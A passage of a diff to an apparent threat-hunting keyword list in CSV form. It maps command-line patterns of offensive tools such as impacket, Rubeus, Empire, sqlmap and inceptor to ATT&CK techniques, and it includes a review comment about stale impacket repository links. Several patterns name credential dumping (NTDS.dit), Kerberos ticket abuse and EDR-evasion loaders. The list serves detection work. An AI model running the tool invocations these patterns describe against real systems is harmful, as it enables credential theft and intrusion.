cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Target * -Shellcode *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --target=* --payload=*cmd.exe /c*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" -"* -target-domain * -outputfile * -no-pass*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -target-domain * -outputfile * -no-pass*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "* targetedKerberoast.py *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* --target-name * --domain * --dc-ip * --executable *.exe*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & 
Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z" "* targets-asn.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
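Review bot: The three impacket rows whose counters are refreshed in this hunk (`* -system SYSTEM -ntds NTDS.dit LOCAL*`, `* -system SYSTEM -ntds NTDS.dit -outputfile*` and `* -target-domain * -outputfile * -no-pass*`) still carry `https://github.com/SecureAuthCorp/impacket` in `metadata_link`, although the project is now maintained under the fortra organisation, the one the nanodump row earlier in this diff already uses. The star and fork counts are presumably being fetched through GitHub's redirect, so the refresh succeeds while the stored link stays stale. Analysts pivot from an alert to this URL, and a reference that depends on a redirect from a former owner's namespace should be pinned to the canonical location: `https://github.com/fortra/impacket`. It would also help if the refresh job compared the repository path the API returns with the stored `metadata_link` and flagged any mismatch.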
@@ -1963,21 +1963,21 @@ "* targets-traceroute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* targets-xml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --target-user * --dc-ip * -command *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" -"* tdotnet publish Athena *","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"* tdotnet publish Athena *","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "* teamspeak2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* teamstracker.py*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","0","N/A","3","1","46","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"* teamstracker.py*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","0","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" "* telnet-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* telnet-encryption.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* telnet-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* tftp-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* tgssub * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* tgtdeleg /nowrap*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* tgssub * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* tgtdeleg /nowrap*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* tgtdeleg /spn:cifs*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" -"* tgtdeleg /target:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* thc-hidra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"* tgtdeleg /target:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* thc-hidra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" "* theHarvester.py *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* thief.py*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" -"* --threads * scan --buckets-file* ","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2221","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"* --threads * scan --buckets-file* ","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - 
T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" "* ticketsplease.*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "* TikiLoader*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "* tls-alpn.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -1987,71 +1987,71 @@ "* TokenStrip.c *","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","10","10","28","5","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" "* TokenStripBOF.o *","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","10","10","28","5","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" "* tokenvator *","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" -"* -Tokenvator -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* --tor *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* -Tokenvator -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* --tor 
*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "* tor-consensus-checker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --tor-port*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"* --tor-type*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --tor-port*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --tor-type*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "* 
traceroute-geolocation.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --transformer donut*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"* --transformer Loader*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"* --transformer pe2sh*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"* --transformer sRDI*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* --transformer donut*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* --transformer Loader*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* --transformer pe2sh*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* --transformer sRDI*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "* TSCHRPCAttack*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - 